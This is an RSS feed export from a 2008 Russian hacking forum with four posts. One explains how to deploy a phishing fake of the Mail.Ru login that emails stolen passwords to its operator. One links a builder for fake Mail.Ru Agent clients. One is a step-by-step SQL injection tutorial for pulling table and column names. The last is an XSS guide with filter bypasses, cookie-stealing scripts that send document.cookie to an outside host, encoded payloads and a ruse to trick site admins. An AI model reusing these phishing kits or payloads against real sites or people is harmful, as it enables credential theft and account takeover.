<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://xakearth.mybb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>XAK-EARTH</title>
		<link>http://xakearth.mybb.ru/</link>
		<description>XAK-EARTH</description>
		<language>ru-ru</language>
		<lastBuildDate>Fri, 14 Nov 2008 23:35:58 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Web-фейк Mail.Ru</title>
			<link>http://xakearth.mybb.ru/viewtopic.php?pid=6#p6</link>
			<description>&lt;p&gt;Здравствуйте! Сегодня мы будем рассматривать взлом почты mail.ru с помощью фейка. Фейк - это поддельная(копия) программа или web-страница, предназначенная для &amp;quot;выманивания&amp;quot; приватной информации(например пароль), а фишка нашего фейка такова - при вводе пароля и e-mail&#039;а в наш фейк, они присылаются нам на почту и записываются в файл &amp;quot;c&amp;quot;.Качаем фейк по ссылке &lt;a href=&quot;http://slil.ru/26334138&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://slil.ru/26334138&lt;/a&gt; . Теперь открываем файл , и видим там следующий код &lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 10.5em&quot;&gt;&lt;pre&gt;$from = &amp;quot;admin@mail.ru&amp;quot;; // от кого письмо
$to = &amp;quot;ocharovylya@list.ru&amp;quot;; // кому присылаем данные

$subj = &amp;quot; Пароль от ящика: $Login@$Domain&amp;quot;; // тема письма
$body = &amp;quot; Логин: $Login@$Domain \n Пароль: $Pass&amp;quot;; // тело письма (реконмендую не менять)&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;и меняем данные на свои(данные могут быть любые, даже отправитель ;) ). Теперь изменяем файл &amp;quot;c&amp;quot; на файл c.txt, а в 0144887.php ищем &lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 7.5em&quot;&gt;&lt;pre&gt;$fp = fopen(&amp;quot;c&amp;quot;,&amp;quot;a+&amp;quot;); //открываем файл
fwrite($fp,&amp;quot;\n [start-- $c -- end] \n&amp;quot;); //записываем всё
fclose($fp); //закрываем&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;меняем &amp;quot;c&amp;quot; на &amp;quot;c.txt&amp;quot;. Теперь идём на 110mb.com, и регаем там аккаунт(ВНИМАНИЕ! При регистрации используйте мыло на Рамблере, т.к Mail.Ru не катит). и заливаем туда весь фейк)). Если 110mb начнет орать типа &amp;quot;c.txt имеет недопустимый размер файла&amp;quot;, то проигнорируйте. Фейк готов=), теперь требуется просто &amp;quot;заманить&amp;quot; жертву на наш фейк. Пароли будут сливатся сюда адресфейка.110mb.com/c.txt .&lt;/p&gt;</description>
			<author>mybb@mybb.ru (HACK_ER)</author>
			<pubDate>Fri, 14 Nov 2008 23:35:58 +0300</pubDate>
			<guid>http://xakearth.mybb.ru/viewtopic.php?pid=6#p6</guid>
		</item>
		<item>
			<title>Builder Fake Mail.Ru Агент 5.2</title>
			<link>http://xakearth.mybb.ru/viewtopic.php?pid=5#p5</link>
			<description>&lt;p&gt;Билдер фейка м-агента 5.2&lt;br /&gt;====================&lt;br /&gt;&lt;strong&gt;СКАЧАТЬ&lt;/strong&gt;-http://delphihacker.ucoz.net/programs/BuilderFakeMAgent5.2bySin3vv1.0.rar&lt;br /&gt;====================&lt;br /&gt;Подробное описание - &lt;a href=&quot;http://delphihacker.ucoz.net/news/2008-09-16-16&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://delphihacker.ucoz.net/news/2008-09-16-16&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (HACK_ER)</author>
			<pubDate>Fri, 14 Nov 2008 23:06:38 +0300</pubDate>
			<guid>http://xakearth.mybb.ru/viewtopic.php?pid=5#p5</guid>
		</item>
		<item>
			<title>SQL-Injection</title>
			<link>http://xakearth.mybb.ru/viewtopic.php?pid=4#p4</link>
			<description>&lt;p&gt;Здравствуйте, уважаемые читатели. Перед вами пошаговое руководство по SQL Injection для новичков. Здесь я попытаюсь очень просто объяснить как украсть нужную нам информацию.&lt;/p&gt;
						&lt;p&gt;Эта статья&amp;#160; является как бы итогом множества других статей, вопросов, ответов, практики итд итп. Написал я эту статью чтобы хоть как то облегчить труды новичков в нашем нелегком деле.&lt;br /&gt;Итак, начнем.&lt;br /&gt;----------------------&lt;br /&gt;ОБНАРУЖЕНИЕ&lt;br /&gt;----------------------&lt;br /&gt;Предположим у нас есть цель взломать тот или иной сайт. Иными словами у нас есть жертва. Пусть это будет &lt;a href=&quot;http://www.victim.com&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com&lt;/a&gt;. Как узнать можно ли провести SQL Injection? Чтобы провести иньекцию надо сначала найти скрипт в котором есть нефильтруемая переменая. Предроложим на сайте есть скрипт news.php через который выводятся, например новости. Предположим у нас есть ссылка на &amp;quot;Новость #1&amp;quot;, и ссылка эта такого вида:&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1.&lt;/a&gt;&lt;br /&gt;Есть также ссылка на &amp;quot;Новость #2&amp;quot; имеющяя сылку вида:&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=2.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=2.&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Признак возможности провести по SQL Injection номер 1:&lt;br /&gt;В адресной строке вместо этого адреса&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1&lt;/a&gt;&lt;br /&gt;вот этот&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1&#039;.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1&#039;.&lt;/a&gt;&lt;br /&gt;Если на экран&amp;#160; выводится сообщение об ошибке такого:&lt;br /&gt;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;&#039; ORDER BY ndate DESC LIMIT 0, 5&#039; at line 1&lt;br /&gt;или такого вида*:&lt;br /&gt;Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/lol/data/www/www.victim.com/news/news.php on line 569&lt;br /&gt;то SQL Injection возможна.&lt;/p&gt;
						&lt;p&gt;Признак возможности провести по SQL Injection номер 2:&lt;br /&gt;Если содержимое&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1&lt;/a&gt;&lt;br /&gt;то же что и у&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=2-1&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=2-1&lt;/a&gt;&lt;br /&gt;то SQL Injection возможна.&lt;/p&gt;
						&lt;p&gt;Из всего этого понятно что нефильтруемая переменая id и именно ей мы будем присваивать наши запросы.&lt;/p&gt;
						&lt;p&gt;---------&lt;br /&gt;ПОЛЯ&lt;br /&gt;---------&lt;br /&gt;Для начала мы должны узнать количество полей в таблице и узнать значение какого поля высвечивается, чтобы потом через это поля выудить информацию.&lt;br /&gt;Сделать это можно двумя способами.&lt;br /&gt;Способ первый:&lt;br /&gt;Банально перебирая количество полей, пока сообщение об ошибке не исчезнет. Пример:&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+union+select+1,2,3,4/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+uni &amp;#8230; +1,2,3,4/*&lt;/a&gt; и так далее.&lt;/p&gt;
						&lt;p&gt;Способ второй:&lt;br /&gt;С помощью оператора ORDER BY, который формирует порядок сортировки полей по номеру (и не только), поля, т.е если выражение:&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+5/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+5/*&lt;/a&gt;&lt;br /&gt;не выдаст ошибку - это значит что в запросе используется как минимум 5 полей. Ввожу еще одно выражение:&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+13/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+13/*&lt;/a&gt;&lt;br /&gt;Это выражение выполнится с ошибкой, т.к. 13 -го поля не существует и теперь нам известно что полей в выражении не меньше 5 и не больше 12. Выбираю любое число из этого диапазона (примерно среднее):&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+8/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+8/*&lt;/a&gt;&lt;br /&gt;Ошибки нет, а это значит что количество полей находится в диапазоне от 8 до 12, Еще раз:&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+10/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+10/*&lt;/a&gt;&lt;br /&gt;Ошибка!. т.е количество полей или 8 или 9, остается только попробывать:&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+order+by+9/*&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+order+by+9/*&lt;/a&gt;&lt;br /&gt;Ошибки нет. Т.о. мы узнали что количество полей равно 9.&lt;br /&gt;Получаем определенную информацию.&lt;br /&gt;Т.к. мы знаем что у нас 9 полей мы можем составить работающее выражение:&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+union+select+1,2,3,4,5,6,7,8,9/*.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+uni &amp;#8230; 6,7,8,9/*.&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;Итак, мы узнали количество полей. Их 9. Предположим что высвечивается значения 1, 2 и 3 поля.&lt;/p&gt;
						&lt;p&gt;-----------&lt;br /&gt;ИМЕНА&lt;br /&gt;-----------&lt;br /&gt;Чтобы вытянуть информацию нужно сначала узнать имена таблиц и полей.&lt;br /&gt;Ну чтож, начнем.&lt;br /&gt;Есть такая замечательная БД INFORMATION_SCHEMA и в ней есть замечательная таблица TABLES и в ней есть замечательные поля TABLE_SCHEMA и TABLE_NAME. Вот с их помощю мы и узнаем имена таблиц. Вот запрос:&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+union+select+table_schema,table_name,3,4,5,6,7,8,9+from+information_schema.tables.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+uni &amp;#8230; ma.tables.&lt;/a&gt;&lt;br /&gt;Теперь в нашем броузере отобрязятся все таблицы Базы Данных.&lt;br /&gt;Остается узнать имена полей. Для этого набираем в адресной строке&lt;br /&gt;&lt;a href=&quot;http://www.victim.com/news.php?id=1+union+select+1,column_name,3,4,5,6,7,8,9+from+information_schema.columns.&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://www.victim.com/news.php?id=1+uni &amp;#8230; a.columns.&lt;/a&gt;&lt;br /&gt;Как можно увидеть мы поставляем имена полей вместой той цифры которая отображается на экране.&lt;br /&gt;-----------&lt;br /&gt;ПОСЛЕСЛОВИЕ&lt;br /&gt;-----------&lt;br /&gt;Также хотелось бы вам рассказать о двух вещях.&lt;br /&gt;Первое:оператор LIMIT.&lt;br /&gt;Если все проходит не так гладко как хотелось бы то в самом конце запроса мы добавляем LIMIT a,b что означает показать b записей начиная от а.&lt;br /&gt;Второе:Коментарий /*.&lt;br /&gt;Если и лимит не помог то попробуйте в самом конце запроса поставить символ комментария. Если ставим знак коментария то остальная часть запроса отбрасывается.&lt;br /&gt;Вот собственно и все дорогие мои :)&lt;br /&gt;-------------&lt;br /&gt;БЛАГОДАРНОСТИ&lt;br /&gt;-------------&lt;br /&gt;Хотелось бы поблагодарить впервую очердь хакзону, потом всех авторов которые публикются на ней, потом всех новичков которые задают вопросы, и конечно всех кто отвечает этим вопросам. Именно благодаря вам была написана эта статья :)&lt;br /&gt;Отдельная благодарность Warag a.k.a. EuGen за его терпеливость.&lt;br /&gt;Warag a.k.a. EuGen я тя оч-оч уважаю и оч-оч благодарен за все :)&lt;br /&gt;Ну и напоследок:&lt;br /&gt;Статья не является побуждением к действию. Это только для ознакомительных целей. Автор не несет ответственности за действия которые были после прочтения данной статьи.&lt;/p&gt;
						&lt;p&gt;З.Ы источник - hackzone.ru&lt;/p&gt;</description>
			<author>mybb@mybb.ru (HACK_ER)</author>
			<pubDate>Fri, 14 Nov 2008 23:03:45 +0300</pubDate>
			<guid>http://xakearth.mybb.ru/viewtopic.php?pid=4#p4</guid>
		</item>
		<item>
			<title>XSS для новичков</title>
			<link>http://xakearth.mybb.ru/viewtopic.php?pid=3#p3</link>
			<description>&lt;p&gt;Привет!!!&lt;br /&gt;В этой теме я хочу детально описать Xss от A до Я.&lt;br /&gt;На античате много есть инфы по Xss, но ни в 1-ой из них я не нашёл хорошего обяснения для новичков, извините если я ошибаюсь...&lt;br /&gt;Статью не полностю написал я, кое-что нашел в инете, и на нашем форуме, за что очень благодарен =)&lt;br /&gt;Так что начнём...&lt;br /&gt;========================================&lt;/p&gt;
						&lt;p&gt;### Xss это Css =&amp;gt; Cross Site Scripting&lt;br /&gt;Чтобы не путать с CSS также назвыают XSS&lt;br /&gt;Впервые этот БАГ появился в 1997.&lt;/p&gt;
						&lt;p&gt;========================================&lt;/p&gt;
						&lt;p&gt;### Как используют XSS.&lt;/p&gt;
						&lt;p&gt;Для начала нам нужно знать что такое Cookie.&lt;br /&gt;Если вы знаете, можете пропустить.&lt;/p&gt;
						&lt;p&gt;Cookie служат для сохранения учетных данных сайта на компьютере поситителя.&lt;br /&gt;Если вы зарегестрировались на сайте под ником &#039;blabluble&#039;, то сайт сохранил у вас на компьютере файл с cookies, где закодированы ваши данные.&lt;br /&gt;А если вы есть админ и у вас есть доступ к сайту, а я - юзер, который украл у вас(админа) cookies, то я могу спокойно зайти на сайт, и сайт меня определяет как &#039;admin&#039; - у меня будут администраторские права.&lt;/p&gt;
						&lt;p&gt;Для смены(подстановки украденных) кук советую использувать прогу CookieEdit для IE или встроенные функции в Опере и Фаерфоксе.&lt;/p&gt;
						&lt;p&gt;========================================&lt;br /&gt;Мы разобрались что такое куки идём дальше...&lt;br /&gt;Чтобы перехватить cookies надо найти место на сайте, где можно выполнить XSS-атаку.&lt;/p&gt;
						&lt;p&gt;### Что такое XSS-атака?&lt;/p&gt;
						&lt;p&gt;XSS атаки - это атаки не на сам сайт, а на пользователей сайта.&lt;br /&gt;XSS - это недоработка в фильтре, приложении.&lt;/p&gt;
						&lt;p&gt;Бывают пассивные XSS и активные XSS.&lt;/p&gt;
						&lt;p&gt;Что такое пассивные XSS?&lt;/p&gt;
						&lt;p&gt;Пассивные - это Xss, которые требуют от жертвы непосредственного участия + есть специфические ограничения и сложности.&lt;br /&gt;Поэтому, пассивные XSS не очень ценятся.&lt;br /&gt;Например, нужно заставить её пройти по ядовитой ссылке, что потребует социальной инженерии, хитрости.&lt;/p&gt;
						&lt;p&gt;Активные - это XSS, которые, не требуют никаких дополнительных действий со стороны жертвы - ей достаточно лишь открыть страницу с вашим XSS и ява-код выполнится автоматически.&lt;br /&gt;Благодаря своей автоматизированности - они очень полезны и ценны.&lt;br /&gt;Например, активные хсс существуют в BB-тегах из-за недостаточной фильтрации, когда вы оставляете сообщение на форуме\гостевухе\чате, которое будет всегда активен при каждом обновлении.&lt;/p&gt;
						&lt;p&gt;========================================&lt;/p&gt;
						&lt;p&gt;### Итак, перейду конкретно к тому, как найти в данном сайте XSS.&lt;/p&gt;
						&lt;p&gt;Как я раньше уже писал что XSS состоит из тегов, они же состоят из html, и javascript языка =).&lt;/p&gt;
						&lt;p&gt;Javascript можно вписывать в html.&lt;br /&gt;Можно кодировать, чтобы обойти фильтры. Но об этом позже.&lt;/p&gt;
						&lt;p&gt;Как узнать, что XSS на даном сайте проходит?&lt;br /&gt;Ужасна распрастраннёная узявимость типа&lt;br /&gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt; Пытаемся вставить во все различные поля этот скрипт... если вышло сообщение значит скрипт обработался и выполнился.&lt;/p&gt;
						&lt;p&gt;Самая распостраненая XSS (наблюдаеться во всех местах где плохая фильтрация):&lt;br /&gt;&amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;br /&gt;Вся суть в &amp;quot;&amp;gt; .&lt;br /&gt;Давайте подумаем, что мы делаем, когда вводим в поле &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt; , что происходит?&lt;br /&gt;Мы вводим в форму &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt; какой-то переменной присваиваеться значение поля. Переменная обрабатывается, &amp;quot;&amp;gt; выполняеться, закрывает&lt;br /&gt;скрипт и выпролняет &amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;Эта XSS самая распостраненая в поисковиках:&lt;br /&gt;Просматриваем все поля сайта и пытаемся вставить &amp;quot;&amp;gt;&amp;lt;script&amp;gt;alert()&amp;lt;/script&amp;gt;&lt;br /&gt;Если вышло сообщение - вы нашли XSS...&lt;/p&gt;
						&lt;p&gt;========================================&lt;/p&gt;
						&lt;p&gt;### А как определить есть фильтр или нет?&lt;/p&gt;
						&lt;p&gt;Просто в любое поле вводим: &#039;&#039;;!--&amp;quot;&amp;lt;fuck&amp;gt;=&amp;amp;{()}&lt;br /&gt;Дальше открываем html страничку и ищем слово &amp;quot;fuck&amp;quot;&lt;br /&gt;и смотри последующие сиволы..&lt;/p&gt;
						&lt;p&gt;Если &amp;lt;&amp;gt; так и остались то это перваый признак уязвимости - значит фильтр имеет дырку.&lt;br /&gt;Если ,&amp;quot;&#039;\ символы остались такими, как были введены - это второй признак уязвимости - возможные дополнительные символы к последующей XSS атаке.&lt;br /&gt;Затем, если открыв HTML, вы не обнаружили &amp;lt;&amp;gt; то скорее всего дырка в фильтре.&lt;br /&gt;Если открыв HTML вы обнаружили, что &amp;lt;&amp;gt; заменены на другие символы, то это облом - фильтр по крайней&lt;br /&gt;мере функционирует нормально.&lt;br /&gt;Возможно еще ввести в поле для проверки фильтрации вот так: &amp;quot;&amp;gt;&amp;lt;&amp;gt;&#039;&amp;quot;`,/\?@%&lt;/p&gt;
						&lt;p&gt;Рассмотрим случай если фильтр съедает &amp;lt;&amp;gt;&lt;/p&gt;
						&lt;p&gt;В этом случае существует вероятность дырки.&lt;br /&gt;К примеру, у фильтра условие съедать &amp;lt;script&amp;gt;,&amp;lt;&amp;gt; и .&lt;br /&gt;Тогда пробуем &amp;lt;zxcvbnzxc792&amp;gt; и смотрим, если не съелось - нашли дырку...дальше можно составить боевой XSS-скрипт.&lt;/p&gt;
						&lt;p&gt;Ещe существует метод вложенного скрипта, к примеру вот так:&lt;br /&gt;&amp;lt;sc&amp;lt;script&amp;gt;ript&amp;gt;alert()&amp;lt;/sc&amp;lt;/script&amp;gt;ript&amp;gt;&lt;br /&gt;это, если фильтр не оч. сильный и плохо фильтрует.&lt;/p&gt;
						&lt;p&gt;Еще можно попробовать во так:&lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;gt;&amp;lt;&amp;lt;script бывает, что фильтр подсчитывает откр. и закр. скобки и закрывает сам. Сначало фильтрует, а потом закрывает... что дает нам дырку к инъекции скрипта.&lt;/p&gt;
						&lt;p&gt;Частенько бывает что фильтр дополняет скрипт, к примеру вот этим :&lt;br /&gt;&amp;quot;&amp;gt;&lt;br /&gt;http://******.ru/trye.asp?sessionID=&amp;quot;&amp;gt;&amp;lt;IMG%20SRC=&amp;quot;javascript:alert();&lt;/p&gt;
						&lt;p&gt;Фильтр смотрит, что ничего опасного в &amp;lt;IMG%20SRC=&amp;quot;javascript:alert(); нет, закрывает и тем самым&lt;br /&gt;выполняя скрипт.&lt;/p&gt;
						&lt;p&gt;Еще конечно если фильтр не фильтрует различные кодировки то можно попытаться закодировать скрипт и вставить код.&lt;/p&gt;
						&lt;p&gt;Все надо пытаться методом проб и ошибок искать...&lt;br /&gt;Пытаться вводить в поля и внимательно просматривать что мы получили от фильтра.&lt;br /&gt;Методом тыков понять, как фильтр работает, есть ли у него недоработки.&lt;br /&gt;Если фильтр плохой, мы всегда можем вставить скрипты.&lt;/p&gt;
						&lt;p&gt;========================================&lt;/p&gt;
						&lt;p&gt;### Активные XSS&lt;/p&gt;
						&lt;p&gt;Тут надо использовать разрешенные теги и прекрываясь ими, надо выполнить запрос.&lt;/p&gt;
						&lt;p&gt;Например, теги url,bb,img.&lt;br /&gt;Весь смысл вставки заключается в том, что нам надо встроить запрос в париметр img или url. У Img есть много парметров кроме src и alt.&lt;br /&gt;Этот баг очень часто используется на форуме, в гостевухах...&lt;/p&gt;
						&lt;p&gt;Рассмотрим активные XSS.&lt;/p&gt;
						&lt;p&gt;Предупреждения!!!&lt;br /&gt;Теги [fon*t],[im*g],[ur*l] пишутса с * для того, штобы они не использовались данным форумом.&lt;br /&gt;Для использувания этих тегов удалите *.&lt;/p&gt;
						&lt;p&gt;К примеру просмотрим форум на наличие использования тегов [fon*t],[im*g],[ur*l] и попытаться вставить в них скрипт или комбинировать их.:&lt;/p&gt;
						&lt;p&gt;[im*g]httр://www.qwewqw.ru/1.jpg[/im*g]Выходит крестик...значит img используется и мы его подобрали (просто дело в том, что бывает img включен, а админы из создания сообщения его убирают, мол картинки вставлять нельзя и бывает он в использовании&lt;br /&gt;разной формы) если крестика нет...а висит всего надпись, то попробуйте еще так:&lt;br /&gt;[im*g src=httр://www.qwewqw.ru/1.jpg]&lt;/p&gt;
						&lt;p&gt;Ну так вот к примеру мы добились крестика этим:&lt;br /&gt;[im*g]httр://www.qweqw.ru/1.jpg[/im*g]&lt;/p&gt;
						&lt;p&gt;Проверим держит ли фильтр пробел, добавляем пробел после расширения jpg :&lt;br /&gt;[im*g]httр://www.qweqw.ru/1.jpg [/im*g]&lt;br /&gt;если крестик есть - тогда всё ОК.&lt;/p&gt;
						&lt;p&gt;Далее существуют у img параметры dynsrc и lowsrc которые держат яваскрипт. Пытаемся к примеру вставить:&lt;br /&gt;[im*g]http://www.qwewqw.ru/1.jpg dynsrc=javascript:alert()[/im*g]&lt;br /&gt;проверяем, отсылаем - появиться сообщение - значит нашли активную XSS и вместо alert() можете вставить любой скрипт.&lt;/p&gt;
						&lt;p&gt;Если фильтр не сдался попробуйте так:&lt;br /&gt;[im*g]http://www.qweqw.ru/&amp;quot;/dynsrc=&amp;quot;javascript:alert()&amp;quot;/1.jpg[/im*g]&lt;br /&gt;и&lt;br /&gt;[im*g]http://www.qwewqw.ru/&amp;quot;/dynsrc=javascript:alert()/1.jpg[/im*g]&lt;/p&gt;
						&lt;p&gt;Если с приведённых примеров получился крестик, то httр://www.qweqw.ru/1.jpg заменяем на адрес сниффера.&lt;/p&gt;
						&lt;p&gt;Бывают случаи, когда jpg отключен админом.&lt;/p&gt;
						&lt;p&gt;========================================&lt;/p&gt;
						&lt;p&gt;###Мы всё время делали коды типа:&lt;/p&gt;
						&lt;p&gt;&amp;lt;script&amp;gt;alert(&#039;HakNet&#039;)&amp;lt;/script&amp;gt;&lt;br /&gt;javascript:alert(&#039;HakNet&#039;)&lt;br /&gt;javascript:alert(&#039;HakNet&#039;)/1.jpg и так далие..&lt;br /&gt;Но они никакой пользы не принесли, это просто коды для проверки(тестировки) на Xss.&lt;/p&gt;
						&lt;p&gt;Вот скрипт:&lt;br /&gt;&amp;lt;script&amp;gt;&lt;br /&gt;img = new Image();&lt;br /&gt;img.src = &amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;Он уже ворует куки =)&lt;/p&gt;
						&lt;p&gt;========================================&lt;/p&gt;
						&lt;p&gt;###Как его подставить к ссылке с Xss?&lt;/p&gt;
						&lt;p&gt;Да очень легко...&lt;br /&gt;Есть несколко вариантов:&lt;/p&gt;
						&lt;p&gt;- 1)делаем вот так:&lt;br /&gt;http://*****.ru/free?p=&#039;&amp;gt;&amp;lt;script&amp;gt;img=new Image();img.src=&amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&amp;quot;+document.cookie;&amp;lt;/script&amp;gt;&lt;br /&gt;где **** сайт с Xss.&lt;/p&gt;
						&lt;p&gt;Вот сам составленый скрипт:&lt;br /&gt;&#039;&amp;gt;&amp;lt;script&amp;gt;img = new Image();img.src=&amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;- 2)Можно ещё делать вот так:&lt;br /&gt;http://*****.ru/free?p=&#039;&amp;gt;&amp;lt;script src=http://haknet.h16.ru/script/js.js&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;где обращаетса к &lt;a href=&quot;http://haknet.h16.ru/script/js.js&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://haknet.h16.ru/script/js.js&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;а в js.js есть:&lt;br /&gt;img=new Image();img.src=&amp;quot;http://antichat.org/s/HakNet.gif?&amp;quot;+document.cookie;&lt;br /&gt;этот способ более надёжен.&lt;/p&gt;
						&lt;p&gt;Но как я уже писал - иногда бывают затруднения с фильтрами на сайте (не прокатывает наш скрипт).&lt;br /&gt;Тогда нужно подумать, как его обойти.&lt;br /&gt;Можно просто нечто добавить, нечто поменять, или удалить в скрипте.&lt;br /&gt;Но есть более надёжным вариант, когда мы просто закодируем скрипт. Для этого есть много прог.&lt;br /&gt;Есть такой сайт как &lt;a href=&quot;http://ha.ckers.org/xss.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://ha.ckers.org/xss.html&lt;/a&gt; (кодировщик-дэкодировщик).&lt;/p&gt;
						&lt;p&gt;Вот пример:&lt;br /&gt;%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&lt;/p&gt;
						&lt;p&gt;это был закодированный:&lt;/p&gt;
						&lt;p&gt;http://*****.ru/free?p=&#039;&amp;gt;&amp;lt;script src=http://haknet.h16.ru/script/js.js&amp;gt;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;- 3) Особенно шифрование необходимо не только для обмана фильтров, но и для обмана АДМИНА при использовании ПАССИВНОЙ ХСС.&lt;/p&gt;
						&lt;p&gt;Вот такой пример на основе социальной инженерии.&lt;br /&gt;Ищем контакт с админом форума бросаем в форуме ему линк на свой сайт, и говориш типа так &amp;quot;клевая фича есть на сайте&amp;quot; и так дале в том же духе.&lt;br /&gt;А на нашем сайте будет как вы уже догадались =) вот ето скрипт:&lt;/p&gt;
						&lt;p&gt;&amp;lt;script language=&amp;quot;JavaScript&amp;quot;&amp;gt;&lt;br /&gt;document.location.href=&amp;quot;%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&amp;quot;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;/p&gt;
						&lt;p&gt;Что делает document.location.href вы спросите меня? )).. это ява-код, который без запроса переходит на указаной сайт Так чо ж у нас получается, дали мы линк админу, и он зашел на наш сайт, вот что делается.. его быстро бросает на&lt;/p&gt;
						&lt;p&gt;%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E&lt;br /&gt;а это уже и есть наш Xss в зашифрованом виде.&lt;/p&gt;
						&lt;p&gt;Примечание: это подействует только тогда, когда Xss будет принадлежать админу сайта которому вы бросили линк...&lt;br /&gt;Иными словами ТРУДНОСТЬ ПАССИВНОЙ ХСС состоит в том, что уязвимость может быть использована ТОЛЬКО, если жертва АВТОРИЗОВАНА на уязвимом сайте!!!&lt;/p&gt;
